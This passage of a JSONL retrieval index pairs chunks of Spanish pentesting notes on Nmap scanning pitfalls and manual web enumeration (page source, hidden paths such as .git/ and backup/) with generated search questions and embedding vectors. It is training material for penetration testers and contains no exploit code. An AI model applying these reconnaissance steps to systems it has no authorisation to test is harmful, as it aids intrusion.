-0.06507, -0.08328, -0.03188, 0.05063, 0.08734, -0.05805, 0.02138, -0.01888, -0.06334, -0.04368, -0.03058, -0.03684, 0.04676, -0.03679, -0.01871, 0.04722, -0.03072, -0.01149, -0.06904, -0.01049, -0.05535, 0.00774, 0.0156, 0.00452, 0.04502, -0.00301, 0.00741, 0.02045, -0.02657, -0.14583, -0.0302, 0.0624, -0.01754, -0.00734, 0.07983, -0.03854, 0.0241, -0.01431, -0.01226, -0.00133, -0.04698, 0.00473, -0.01947, -0.02698, 0.13103, 0.02829, -0.07943, 0.02447, -0.02928, -0.01265, 0.00808, -0.01895, 0.01402, -0.04774, 0.00323, -0.01996, -0.09362, 0.06971, -0.0155, -0.06777, 0.05003, -0.02264, 0.01761, 0.01539, -0.04472, 0.04392, -0.00312, -0.04145, -0.05803, 0.02039, 0.03755, 0.01066, -0.01564, 0.06339, 0.03756, 0.05519, -0.01542, 0.00849, -0.01284, -0.02345, -0.05077, -0.04474, 0.00978, 0.01627, 0.02869, -0.04327, -0.03567, -0.03643, 0.03432, 0.00481, 0.02771, -0.04277, -0.01193, 0.01021, 0.03668, -0.04921, -0.01729, -0.03937, -0.00531, -0.0838, 0.05862, 0.01655, -0.02972, -0.01963, 0.07574, 0.04649, -0.04252, -0.04037, -0.00305]} -{"tipo": "pregunta", "herramienta": "Nmap", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Trampas\n- El top-1000 **ya** incluye 80/443/22/445. Si `grep` no saca nada y el scan cubrΓ­a el puerto β†’ **la mΓ‘quina no estΓ‘ viva**, no es el scan.\n- `filtered β‰  open` (firewall/sin respuesta).\n- `-Pn` en un /24 = ruido (256 hosts \"up\" falsos). `-Pn` es para **1 host concreto**.\n- ConfusiΓ³n clΓ‘sica: **SNMP = UDP/161 (`-sU`)**, **SMTP = TCP/25 (`-sS`)**.\n\nRelacionado: Nmap NSE Β· searchsploit Β· Trampas de enumeraciΓ³n Β· SMB Β· OSCP MOC", "indexar": "que programa detecta si un puerto estΓ‘ realmente abierto o es ruido?", "v": [-0.09039, 0.06522, -0.23149, -0.20224, 0.05152, -0.04181, -0.01369, -0.03053, -0.00868, -0.16096, -0.06946, 0.0017, 0.01072, -0.02919, -0.01244, -0.15268, -0.05681, 0.13397, 0.04444, -0.03651, -0.085, -0.10926, -0.02352, -0.06468, 0.07769, 0.02873, -0.01242, 0.05361, -0.03934, 0.03358, 0.04009, 0.05349, 0.14772, -0.05835, -0.10718, -0.08536, 0.13164, 0.00546, 0.1164, 0.14187, 0.0646, 0.00956, -0.00507, 0.0406, 0.11884, -0.08029, 0.01654, -0.04403, 0.01898, 0.02351, -0.03182, -0.00965, 0.02777, 0.02477, 0.04768, -0.04804, -0.01654, 0.02926, 0.00452, -0.16, 0.02359, -0.01287, 0.04057, -0.10766, -0.02385, -0.025, 0.17256, 0.13895, 0.03032, -0.05889, 0.00595, -0.08411, 0.09825, 0.05985, 0.04806, -0.03726, -0.04921, -0.0217, 0.01345, 0.02491, 0.03528, 0.03601, 0.1742, 0.01609, -0.09068, -0.03894, 0.00283, -0.01659, 0.01488, -0.03977, -0.03798, 0.09082, -0.0099, 0.13443, 0.07235, 0.00144, 0.12162, -0.01404, -0.02905, 0.12061, 0.1095, 0.00184, -0.05784, -0.02662, 0.02053, 0.11207, -0.05283, -0.10077, 0.05103, -0.01232, 0.07166, -0.00857, -0.00345, -0.04852, -0.09769, -0.03327, -0.00604, -0.06116, 0.0783, 0.01421, -0.08531, 0.01258, -0.04885, -0.01898, -0.04506, -0.03279, 0.01027, 0.02301, 0.06141, 0.06893, 0.05377, -0.00677, 0.00608, 0.00114, -0.0534, -0.10542, -0.07771, -0.04891, 0.01292, -0.02911, -0.03116, 0.05611, 0.04508, -0.02929, 0.0457, -0.03131, -0.05044, -0.02006, -0.01374, 0.02332, 0.00333, 0.05473, -0.00878, 0.0201, -0.05405, 0.08377, 0.09643, -0.00445, -0.06274, 0.01117, -0.00434, 0.04121, -0.09778, -0.07612, 0.06854, -0.05254, -0.00663, 0.03535, 0.12223, 0.01057, -0.05782, 0.02862, 0.07322, -0.0475, -0.08394, 0.00527, -0.02359, -0.01921, -0.00013, -0.04102, -0.15659, 0.0763, 0.02455, -0.08221, -0.0004, -0.02588, 0.02749, -0.01934, -0.1226, 0.02952, 0.03219, -0.03592, -0.00608, -0.00665, 0.0333, 0.02542, 0.02966, -0.02158, -0.01768, -0.00708, 0.00347, -0.01419, 0.02486, -0.00341, 0.01009, 0.09918, 0.023, 0.00076, 0.07803, 0.09114, 0.04579, -0.03065, -0.01177, 0.02201, -0.01953, 0.0436, -0.04876, 0.04185, 0.05685, 0.05816, -0.0365, 0.03705, 0.04926, 0.05816, -0.00924, -0.03079, 0.00167, 0.01379, 0.08571, 0.04222, 0.0405, -0.03563, -0.00506, 0.00794, -0.06025, 0.04701, -0.07557, 0.00716, -0.04272, -0.08005, -0.00077, -0.00821, -0.00261, -0.05182, 0.04605, -0.01695, 0.01005, 0.01373, 0.01873, -0.02374, -0.11363, 0.05539, 0.01691, -0.08596, 0.04962, 0.03083]} -{"tipo": "pregunta", "herramienta": "Nmap", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Trampas\n- El top-1000 **ya** incluye 80/443/22/445. Si `grep` no saca nada y el scan cubrΓ­a el puerto β†’ **la mΓ‘quina no estΓ‘ viva**, no es el scan.\n- `filtered β‰  open` (firewall/sin respuesta).\n- `-Pn` en un /24 = ruido (256 hosts \"up\" falsos). `-Pn` es para **1 host concreto**.\n- ConfusiΓ³n clΓ‘sica: **SNMP = UDP/161 (`-sU`)**, **SMTP = TCP/25 (`-sS`)**.\n\nRelacionado: Nmap NSE Β· searchsploit Β· Trampas de enumeraciΓ³n Β· SMB Β· OSCP MOC", "indexar": "con que puedo saber si una mΓ‘quina estΓ‘ viva aunque el escaneo no devuelva resultados?", "v": [-0.20486, -0.18526, -0.27856, 0.07714, -0.11187, -0.02954, -0.1291, -0.13905, 0.01864, -0.246, -0.02442, -0.12976, 0.00303, -0.07731, 0.07127, 0.1355, 0.07457, -0.07532, 0.10095, 0.08966, -0.0405, -0.06475, -0.12025, 0.04008, -0.03448, 0.18529, -0.10957, 0.16616, -0.081, -0.05011, -0.01355, 0.06589, 0.05396, -0.14484, -0.02689, 0.0407, 0.088, -0.05949, 0.09264, 0.04782, -0.03949, -0.05249, -0.01566, -0.09311, 0.02011, -0.13871, -0.06452, -0.03037, -0.12708, -0.00319, -0.04535, 0.03478, -0.02504, 0.00893, -0.0606, -0.10622, 0.01056, 0.05001, 0.17101, -0.14193, -0.08437, 0.06754, -0.02606, 0.06094, -0.05232, 0.08283, 0.07327, -0.04923, 0.04455, 0.00061, -0.05713, 0.04238, -0.01635, -0.05888, -0.01235, -0.06939, 0.08175, -0.01212, 0.0972, -0.00148, -0.05177, -0.005, -0.02174, -0.08598, -0.057, -0.011, 0.03285, -0.06843, 0.08374, -0.10784, -0.09441, 0.04419, 0.03559, 0.06869, 0.04284, 0.01937, 0.03412, -0.02123, -0.02298, -0.00295, 0.04789, 0.00526, -0.04759, 0.0375, -0.03461, 0.0266, 0.05125, -0.05841, -0.03872, 0.08738, 0.01093, 0.01327, -0.01832, -0.03131, -0.07514, 0.05475, 0.00982, 0.01062, -0.01475, 0.05177, -0.01989, 0.07796, 0.0157, -0.03738, 0.00047, -0.06493, 0.08144, 0.04776, 0.02982, 0.00842, 0.00716, 0.05813, 0.0127, -0.02535, 0.06468, 0.01407, 0.06978, -0.03803, 0.03233, -0.05905, -0.01577, 0.04316, -0.021, -0.06802, 0.00843, 0.01049, 0.00729, -0.0616, 0.00682, -0.04024, 0.03395, -0.00218, 0.0263, 0.03225, -0.0569, 0.03671, 0.02265, 0.032, 0.03969, 0.01059, -0.0342, 0.01039, -0.11367, 0.0661, -0.07074, 0.02235, -0.06825, -0.07153, -0.02802, 0.00591, -0.0133, -0.03347, 0.03797, 0.00186, -0.02883, 0.04176, -0.01308, 0.03623, 0.01236, -0.02943, 0.02358, 0.06944, -0.00982, -0.06696, -0.00218, -0.02148, -0.01326, 0.01594, -0.00696, 0.01625, 0.08211, 0.03657, 0.0011, -0.02747, -0.02933, 0.00855, 0.00284, 0.00045, 0.05343, -0.06303, -0.05316, 0.05139, -0.02233, 0.01466, 0.0008, -0.02136, -0.05672, -0.06056, 0.0219, -0.02692, 0.0275, 0.01497, -0.01546, -0.07344, -0.03556, 0.0207, 0.02616, -0.06418, -0.00269, -0.00934, 0.04197, -0.04311, 0.00911, -0.0074, -0.00701, -0.07813, 0.01838, 0.01403, 0.08621, 0.01102, -0.04688, -0.00231, -0.00763, -0.00086, -0.02724, -0.01771, 0.04189, 0.03695, -0.027, -0.02527, -0.00448, 0.05334, 0.00549, 0.00035, -0.00162, -0.01283, -0.02315, -0.02466, -0.08411, -0.0174, -0.00149, 0.02108, 0.00229, 0.02041, 0.05731, 0.05505]} -{"tipo": "pregunta", "herramienta": "Nmap", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Trampas\n- El top-1000 **ya** incluye 80/443/22/445. Si `grep` no saca nada y el scan cubrΓ­a el puerto β†’ **la mΓ‘quina no estΓ‘ viva**, no es el scan.\n- `filtered β‰  open` (firewall/sin respuesta).\n- `-Pn` en un /24 = ruido (256 hosts \"up\" falsos). `-Pn` es para **1 host concreto**.\n- ConfusiΓ³n clΓ‘sica: **SNMP = UDP/161 (`-sU`)**, **SMTP = TCP/25 (`-sS`)**.\n\nRelacionado: Nmap NSE Β· searchsploit Β· Trampas de enumeraciΓ³n Β· SMB Β· OSCP MOC", "indexar": "que herramienta me sirve para evitar trampas de enumeraciΓ³n al revisar puertos?", "v": [0.09913, 0.02405, -0.28586, -0.22017, 0.0996, -0.02606, 0.08184, -0.05276, -0.06237, -0.0589, -0.05419, 0.05336, 0.14297, -0.02358, 0.12193, 0.03966, 0.03011, 0.03507, 0.18268, 0.05286, 0.00901, -0.09384, -0.09732, -0.01703, -0.08039, -0.03162, -0.07618, -0.07105, -0.18447, 0.03303, -0.06837, 0.10509, 0.13625, -0.09661, -0.03286, -0.00682, 0.03504, -0.0223, 0.09459, 0.07592, 0.11728, 0.10049, -0.08862, -0.0216, -0.01657, -0.08889, -0.03481, -0.00105, 0.04397, 0.11131, -0.10123, -0.00896, -0.11875, -0.08849, -0.06316, -0.08801, 0.11393, -0.05861, -0.0191, -0.15972, -0.02786, -0.01528, -0.01127, -0.0255, -0.0822, -0.04591, -0.0388, -0.02781, -0.0456, 0.10234, 0.01375, 0.00202, 0.02178, 0.02423, -0.10151, -0.19767, 0.0847, 0.03341, 0.06285, 0.0251, 0.03778, -0.06815, -0.05302, 0.02207, -0.01025, -0.10828, -0.06877, 0.03467, 0.01144, -0.09465, 0.01566, 0.05039, 0.04409, 0.03355, -0.02229, -0.03724, 0.04725, -0.01949, 0.00978, 0.03207, 0.16517, -0.08298, -0.05918, 0.08053, -0.08261, 0.03817, -0.04396, -0.0446, 0.01123, -0.04907, 0.09415, 0.03234, 0.03403, -0.03329, -0.00732, 0.04455, -0.03585, -0.07373, 0.01382, -0.02605, 0.05409, -0.03777, -0.15139, 0.0054, 0.01165, 0.01403, 0.01297, 0.07832, 0.03834, -0.00105, 0.02881, -0.07019, -0.08623, -0.00414, -0.05941, -0.07014, 0.00991, -0.12323, 0.00286, -0.01114, -0.0362, 0.12288, -0.07968, -0.03444, 0.02187, 0.03949, 0.03299, -0.00566, -0.03222, 0.01384, 0.04634, -0.04564, 0.00787, 0.04505, 0.02462, -0.00245, 0.08117, 0.02691, -0.11783, 0.05137, -0.02657, -0.0283, 0.01409, -0.01955, 0.01799, -0.05595, 0.05784, 0.04147, 0.03136, -0.02239, 0.00748, 0.01901, -0.02504, -0.04895, -0.00239, 0.00241, -0.05278, 0.04726, -0.10032, -0.04305, -0.02826, -0.01027, -0.03875, -0.06613, 0.00035, -0.07127, -0.01804, -0.06491, 0.02514, 0.08911, 0.01144, 0.00507, -0.01409, -0.05841, 0.01158, 0.03189, 0.02648, 0.02241, -0.00928, -0.0339, 0.02442, 0.01136, 0.0076, -0.04173, 0.06065, 0.0232, -0.05097, -0.02929, 0.0063, 0.05934, 0.0345, 0.0097, 0.00636, -0.02362, 0.0078, -0.02826, -0.03509, 0.07903, 0.01192, 0.02923, -0.01956, 0.02203, 0.00531, 0.06523, -0.02492, 0.03974, 0.00068, 0.03672, 0.01302, 0.02043, 0.03237, -0.05987, -0.00144, -0.00263, -0.02253, -0.09735, -0.01283, -0.03205, -0.00404, -0.02716, -0.01736, -0.02903, 0.01513, -0.05266, -0.00255, -0.01837, -0.00424, -0.03019, -0.02475, -0.02288, -0.01763, -0.00284, 0.03811, -0.04173, 0.00369, -0.01822]} -{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n web", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n web.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# EnumeraciΓ³n web\n\n> Puertos 80/443/8080. El vector web es el foothold mΓ‘s comΓΊn en standalones. Parte de EnumeraciΓ³n.\n> Para la **metodologΓ­a de ataque** (quΓ© probar en cada input) ve a Hacking web; aquΓ­ solo enumeras.", "indexar": "que herramienta sirve para hacer una enumeraciΓ³n bΓ‘sica de puertos en un servidor web?", "v": [0.01277, 0.03, -0.20607, -0.20188, 0.00632, -0.17466, 0.07843, -0.13286, 0.00934, -0.116, -0.12384, 0.05964, 0.06118, -0.10621, 0.04206, 0.04402, 0.10066, -0.11432, 0.04997, 0.04744, -0.00205, 0.07325, -0.03476, 0.03218, -0.11633, 0.03129, 0.05948, -0.0459, -0.18358, 0.09463, -0.00773, 0.00926, 0.07046, -0.03759, -0.01956, -0.11537, -0.03304, 0.06399, -0.02066, 0.0653, 0.04211, 0.05559, -0.05515, 0.00385, -0.00708, 0.019, 0.02844, -0.06622, 0.1029, -0.00527, -0.0549, -0.10602, -0.15721, -0.03351, -0.09379, -0.03507, 0.17034, -0.17541, 0.02815, -0.1363, -0.15594, 0.01526, -0.02903, -0.0935, 0.007, 0.00179, -0.06492, -0.04491, -0.03628, -0.01188, -0.07134, 0.01163, 0.05733, -0.05083, 0.02794, -0.05427, 0.01625, 0.03924, 0.07522, 0.07425, 0.06213, -0.02753, -0.05486, 0.02967, -0.08947, -0.08151, 0.01077, -0.01056, 0.08888, -0.09052, 0.06989, 0.11398, -0.07718, 0.05871, -0.00247, -0.02368, 0.05565, -0.05508, -0.0075, -0.01508, 0.16989, -0.05584, -0.08803, 0.05399, 0.00369, 0.06106, 0.0813, -0.05786, -0.01179, -0.02512, 0.12347, -0.00613, 0.00847, -0.02952, -0.05803, 0.01088, -0.02296, -0.06281, 0.02202, 0.01096, 0.03013, -0.03039, -0.06135, 0.00606, -0.01244, 0.00392, 0.02353, 0.07687, 0.04121, -0.06932, 0.04688, -0.04264, -0.10294, -0.00254, -0.04405, -0.00977, 0.08879, -0.13144, -0.03645, -0.06387, -0.01704, 0.09056, -0.11743, -0.0293, 0.06625, -0.00087, 0.10054, -0.04053, -0.11185, -0.0065, 0.0376, -0.04506, -0.06792, 0.02025, -0.0944, -0.02267, 0.03084, -0.04284, -0.09465, 0.05314, 0.03703, -0.01243, 0.05294, 0.02374, 0.04919, -0.04778, -0.00361, 0.06273, 0.06778, 0.03509, -0.00383, 0.0708, -0.02009, -0.08778, 0.01459, 0.00326, -0.11378, -0.0247, -0.05199, -0.00303, -0.01554, -0.00341, -0.05325, 0.00283, -0.05556, -0.09236, 0.00314, -0.06549, -0.02759, 0.07081, -0.00846, 0.00927, -0.06172, 0.01147, 0.05081, -0.00139, -0.02806, -0.02302, 0.02953, -0.02399, 0.02664, -0.04852, 0.00581, -0.03908, 0.01714, 0.05643, -0.07094, -0.0152, -0.00219, 0.05565, -0.03298, -0.0117, 0.04088, -0.04317, -0.00088, 0.00316, 0.04916, 0.01321, -0.01945, 0.02587, -0.01906, -0.01749, -0.04923, 0.05011, 0.01464, 0.08014, 0.03142, 0.00726, 0.03738, 0.00908, 0.03516, -0.04407, -0.02874, -0.0291, 0.0108, -0.04849, -0.0235, -0.00894, -0.05561, -0.02494, -0.00122, 0.02419, -0.00954, -0.02933, 0.03781, -0.07783, 0.01141, -0.02639, -0.02889, -0.04687, -0.04171, -0.03126, 0.04668, -0.0113, 0.00542, -0.01577]} -{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n web", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n web.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# EnumeraciΓ³n web\n\n> Puertos 80/443/8080. El vector web es el foothold mΓ‘s comΓΊn en standalones. Parte de EnumeraciΓ³n.\n> Para la **metodologΓ­a de ataque** (quΓ© probar en cada input) ve a Hacking web; aquΓ­ solo enumeras.", "indexar": "con que programa puedo verificar si los puertos 80, 443 y 8080 estΓ‘n abiertos?", "v": [0.12873, 0.05193, -0.10737, -0.04888, 0.07124, -0.02548, 0.14457, -0.0656, -0.06222, -0.13898, -0.06573, 0.00066, 0.05586, -0.09976, 0.04212, -0.01925, -0.05256, -0.06209, 0.05753, 0.09197, 0.01824, -0.01021, -0.03176, -0.10628, 0.01361, 0.13195, -0.06597, -0.00662, -0.04759, -0.04711, 0.08492, -0.00499, 0.08372, -0.04955, 0.05123, -0.05587, -0.0058, 0.00813, 0.07712, 0.09636, 0.05719, 0.08578, 0.01673, -0.11168, 0.17557, -0.02705, -0.01012, -0.0316, -0.00088, -0.13211, -0.04097, 0.00499, -0.01405, 0.05767, -0.04711, 0.02628, 0.03655, 0.0612, -0.00053, 0.0061, 0.02894, 0.05138, -0.02389, -0.02923, 0.07495, -0.02625, 0.06758, 0.09231, -0.11606, -0.01629, -0.07429, -0.0223, -0.02091, 0.01889, -0.02313, -0.05001, -0.04623, -0.00581, 0.02188, 0.01303, 0.12573, 0.07441, 0.05734, -0.09393, -0.07799, -0.05228, -0.08546, -0.06251, -0.01398, -0.13828, 0.03013, 0.03351, 0.0176, 0.1642, -0.02777, -0.0067, 0.04868, 0.10569, -0.00033, 0.12269, 0.05047, 0.02668, -0.05688, -0.00029, -0.00907, 0.02422, -0.02918, -0.06635, -0.0409, 0.05966, 0.03249, 0.00976, -0.04472, -0.09208, -0.00427, -0.01269, -0.04245, -0.07032, 0.09204, -0.04991, -0.07507, -0.02818, -0.08229, 0.05892, 0.05678, -0.11015, 0.03306, 0.16906, -0.00827, 0.08535, 0.11442, -0.00618, -0.07213, -0.04257, 0.01637, -0.0644, -0.02941, -0.02333, -0.01319, -0.00491, -0.04351, 0.12787, 0.04292, -0.03489, 0.10719, -0.02609, -0.04946, 0.01992, -0.0368, -0.00734, -0.00072, 0.08074, -0.03033, 0.15774, -0.04443, 0.06817, 0.10145, -0.04508, -0.03964, -0.00661, 0.01451, 0.01045, -0.07713, -0.07744, 0.07036, 0.01032, -0.04072, 0.02786, 0.12637, 0.02729, -0.08731, 0.07893, -0.04794, -0.11958, 0.00883, -0.05369, -0.06624, -0.06348, -0.02971, -0.08054, -0.09952, 0.02377, -0.00139, -0.11399, -0.0811, -0.08386, -0.03473, 0.01483, 0.01047, 0.06922, 0.05581, 0.05586, -0.02089, -0.01067, -0.02311, 0.0513, -0.02508, 0.02022, -0.05545, -0.04295, -0.03392, 0.06881, -0.00855, -0.07758, -0.0012, 0.11852, -0.08728, 0.00837, 0.03809, 0.09291, 0.02262, -0.14181, 0.04228, -0.02212, -0.09167, -0.00834, 0.03312, 0.06296, 0.04241, 0.07332, -0.04316, 0.00606, -0.00845, 0.11398, 0.04116, -0.0761, -0.00362, 0.04017, 0.06643, 0.033, 0.00983, -0.01921, -0.06039, -0.02758, 0.02512, -0.00985, -0.0014, -0.01259, -0.02066, -0.0736, 0.06086, 0.02808, -0.00439, -0.04915, 0.06008, -0.02131, -0.06064, 0.01293, -0.01955, -0.0459, -0.01289, -0.00026, 0.03181, -0.0329, 0.02927, -0.04269]} -{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n web", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n web.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# EnumeraciΓ³n web\n\n> Puertos 80/443/8080. El vector web es el foothold mΓ‘s comΓΊn en standalones. Parte de EnumeraciΓ³n.\n> Para la **metodologΓ­a de ataque** (quΓ© probar en cada input) ve a Hacking web; aquΓ­ solo enumeras.", "indexar": "cual es el mejor software para realizar la fase de enumeration inicial en hacking web?", "v": [0.0642, 0.03875, -0.09068, -0.12866, 0.01902, -0.1966, -0.06677, -0.02828, -0.07075, -0.00432, -0.08802, -0.04947, -0.07469, -0.05145, 0.06662, 0.09094, 0.09132, -0.14426, 0.0378, 0.03635, -0.06347, 0.07061, -0.13463, -0.00311, -0.07827, -0.10486, -0.08342, 0.11314, -0.18782, -0.01473, 0.09206, -0.08717, -0.01935, 0.0068, -0.1209, 0.06688, 0.09923, 0.09827, 0.09289, 0.0914, 0.0048, 0.04606, -0.1113, 0.01033, 0.05235, -0.02951, 0.04873, -0.04939, 0.11842, -0.07551, 0.06008, 0.03133, -0.13943, -0.04675, 0.05135, -0.11611, 0.10207, -0.1162, 0.067, -0.1611, -0.0573, 0.08477, 0.0205, -0.05652, 0.00356, 0.01315, -0.03467, -0.00952, -0.07348, 0.11631, 0.07483, 0.06912, 0.03675, -0.03848, 0.03543, 0.00578, 0.02727, 0.0559, 0.04508, -0.00805, -0.01492, -0.01202, -0.05087, 0.06964, -0.1478, -0.06549, 0.03096, -0.06174, 0.04978, -0.02204, 0.07882, 0.05948, -0.08409, 0.02274, 0.02054, -0.11866, 0.13484, 0.02941, -0.02104, -0.01045, -0.07658, -0.10744, -0.1151, 0.17159, -0.05764, 0.02762, 0.0021, -0.0295, -0.04587, -0.09614, 4e-05, 0.02598, -0.03887, -0.03773, -0.0487, -0.07618, 0.01406, -0.07817, 0.00564, -0.1001, 0.00461, -0.04617, -0.06739, -0.00784, 0.08157, 0.01083, -0.04808, 0.05066, -0.04039, -0.08231, 0.02859, -0.04733, -0.10091, 0.04022, -0.06538, 0.01827, 0.00485, -0.07257, 0.05132, 0.01192, -0.00834, 0.05749, -0.07763, 0.036, 0.08367, 0.00127, 0.02943, -0.01246, -0.06808, -0.02742, -0.02611, 0.08407, -0.032, 0.01915, -0.15437, 0.00828, -0.09246, -0.07799, 0.00022, 0.04819, -0.0103, 0.01799, -0.01763, -0.08033, -0.04539, 0.00865, -0.01796, 0.03831, 0.02898, -0.02878, 0.00458, 0.10189, -0.00934, -0.09601, 0.00171, -0.01121, -0.03582, -0.01829, -0.01668, -0.06712, -0.0493, -0.04488, 0.09175, 0.03349, -0.0711, -0.02304, 0.00219, 0.00914, -0.04789, 0.03554, -0.01591, -0.04385, -0.07711, 0.03706, 0.07204, -0.03505, -0.07608, -0.01744, 0.06822, -0.01754, -0.05335, -0.04392, -0.01777, -0.02385, -0.00442, 0.05126, 0.01855, -0.07486, -0.04714, 0.01398, 0.02354, -0.0236, -0.00745, -0.00448, -0.02233, -0.04096, 0.03903, 0.00444, -0.04873, -0.02011, 0.0316, 0.01247, 0.02751, 0.02095, -0.04628, 0.01389, 0.04252, 0.06688, 0.01314, -0.0097, -0.02146, -0.02304, -0.00531, -0.07445, -0.02442, -0.04697, 0.01592, -0.04457, -0.05867, -0.03918, 0.00923, 0.01682, 0.00671, -0.07895, -0.03752, -0.042, -0.07489, -0.01269, -0.00884, -0.04214, -0.07276, 0.02118, 0.00256, 0.01267, -0.01846, 0.00862]} -{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n web", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n web.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Primero, lo manual\n```\nCtrl+U siempre β†’ comentarios con creds, paths, endpoints\nJS embebidos β†’ APIs ocultas (LinkFinder, JSparser)\nrobots.txt β†’ perezoso; mira tambiΓ©n:\n sitemap.xml, .git/, .svn/, .htaccess, .DS_Store,\n backup/, old/, dev/, test/, admin/\n```", "indexar": "ΒΏcon quΓ© herramienta puedo encontrar credenciales ocultas en los comentarios de cΓ³digo?", "v": [-0.02186, 0.038, -0.08022, -0.03677, 0.00853, -0.20996, -0.02539, 0.07889, -0.11069, -0.16658, -0.10685, -0.08889, -0.02106, -0.10004, 0.11511, 0.03852, 0.17522, -0.08146, 0.02274, -0.02103, -0.01758, -0.14202, -0.14761, -0.07274, -0.03864, -0.08094, 0.00189, 0.05989, -0.06989, -0.06409, 0.03466, 0.00333, 0.03257, 0.06693, -0.17679, 0.12927, 0.00209, 0.05912, -0.00667, 0.09567, -0.01296, 0.01549, 0.00881, 0.05243, 0.07019, -0.0437, -0.06387, 0.16476, -0.08721, 0.0068, -0.14665, -0.24967, -0.12347, -0.07816, 0.04141, -0.15848, 0.14099, -0.00088, 0.01466, -0.05369, -0.00128, -0.00954, 0.01777, -0.05964, -0.06015, -0.02808, 0.05031, -0.04261, -0.09469, 0.10171, -0.01351, 0.0293, -0.01878, 0.02079, 0.04719, 0.01969, 0.00421, -0.03273, 0.01184, 0.06283, 0.05459, 0.01511, -0.01956, 0.03227, -0.01318, -0.03258, -0.04598, -0.01289, -0.06801, -0.11196, 0.06611, 0.06796, -0.05708, 0.05197, -0.00416, 0.06656, 0.01794, -0.00189, -0.01511, 0.03958, 0.08417, -0.08927, -0.0687, 0.08046, 0.06795, 0.10579, 0.01304, -0.01329, -0.00525, -0.01735, 0.06578, -0.02298, -0.08829, -0.01641, 0.00751, 0.08009, -0.03665, -0.05257, -0.01153, -0.08561, -0.00819, 0.06823, -0.09791, 0.00659, 0.03455, 0.04479, -0.02939, 0.09713, -0.03306, -0.14884, -0.08945, -0.08699, -0.03479, 0.0586, 0.02304, 0.04548, 0.05265, -0.05429, -0.01297, 0.05634, 0.04967, -0.05576, -0.01074, -0.02302, 0.01963, 0.03, -0.00465, -0.08201, -0.01651, -0.09894, 0.02471, 0.08153, 0.03515, -0.01118, -0.01308, 0.07889, 0.03507, -0.0386, -0.09236, 0.01168, -0.08538, -0.02539, -0.01895, -0.05309, -0.0104, -0.04893, 0.00933, -0.01767, 0.01124, 0.03068, 0.06426, 0.02713, 0.08848, -0.07763, 0.03905, -0.04451, 0.01948, -0.05811, -0.03994, -0.07588, 0.01314, 0.08306, 0.02285, -0.06406, 0.09074, 0.0106, 0.05547, 0.00196, -0.02444, -0.00326, 0.03013, -0.02696, 0.0546, 0.01181, -0.05614, 0.01046, 0.06336, -0.0342, 0.00036, -0.07613, -0.073, 0.03005, 0.01456, -0.06064, 0.00082, 0.076, -0.01911, 0.00227, -0.033, 0.05079, 0.05512, -0.02478, 0.09066, -0.05258, -0.01777, -0.01675, -0.04925, 0.05409, -0.00076, -0.06306, 0.02431, -0.02205, 0.01435, -0.01393, 0.03375, -0.01647, -0.04717, 0.07613, 0.01768, 0.03828, 0.02176, -0.00466, -0.0479, 0.01493, 0.02953, -0.03599, 0.00202, 0.02977, -0.04791, -0.01423, -0.03416, 0.02451, 0.03765, -0.05338, -0.06624, -0.01098, -0.02549, -0.02128, -0.01497, -0.03731, -0.03415, -0.01624, 0.03907, -0.05648, 0.06467, -0.024]} -{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n web", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n web.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Primero, lo manual\n```\nCtrl+U siempre β†’ comentarios con creds, paths, endpoints\nJS embebidos β†’ APIs ocultas (LinkFinder, JSparser)\nrobots.txt β†’ perezoso; mira tambiΓ©n:\n sitemap.xml, .git/, .svn/, .htaccess, .DS_Store,\n backup/, old/, dev/, test/, admin/\n```", "indexar": "que programa me ayuda a buscar rutas ocultas y archivos sensibles en un sitio web", "v": [0.19432, 0.02134, -0.22516, -0.15483, -0.00788, -0.04334, -0.063, -0.07928, -0.02899, -0.06888, -0.08058, -0.14343, 0.08144, 0.03081, 0.05298, -0.10755, 0.14612, 0.08225, 0.07642, -0.02777, 0.00134, -0.08722, -0.01111, -0.0004, -0.09833, -0.11808, 0.12082, 0.01022, -0.01118, -0.02735, -0.01848, 0.05222, -0.02495, 0.02385, -0.03805, 0.04218, 0.03828, -0.05211, -0.00562, -0.07687, -0.00255, 0.00304, -0.08637, 0.08037, -0.02418, -0.01189, -0.03821, -0.06831, 0.02643, -0.05857, -0.07269, -0.16262, -0.11658, -0.03286, 0.06342, -0.0837, 0.07373, -0.1417, 0.00396, 0.00995, -0.04496, 0.08097, 0.02977, 0.01102, 0.00809, 0.04334, 0.1225, 0.03208, -0.11184, -0.0024, -0.00874, 0.04672, 0.12374, -0.03022, -0.006, -0.01938, 0.04476, -0.02984, 0.04707, -0.04028, 0.05474, 0.07919, 0.02704, 0.13033, -0.0853, -0.09184, -0.0027, 0.03575, -0.09992, -0.10214, 0.07143, 0.01585, -0.07905, 0.08692, -0.03782, -0.05334, 0.13405, -0.03355, 0.04469, -0.00555, -0.03499, -0.11744, -0.11115, 0.07017, 0.04602, 0.13778, 0.01523, 0.00117, -0.08176, 0.04757, 0.10183, -0.01374, -0.01377, -0.06294, -0.05594, 0.05542, 0.01813, -0.05955, 0.00538, -0.12215, -0.06299, 0.06974, -0.10873, 0.04555, 0.04418, 0.01941, -0.01248, 0.08793, 0.00265, -0.00258, -0.04386, -0.04171, -0.09376, -0.0122, 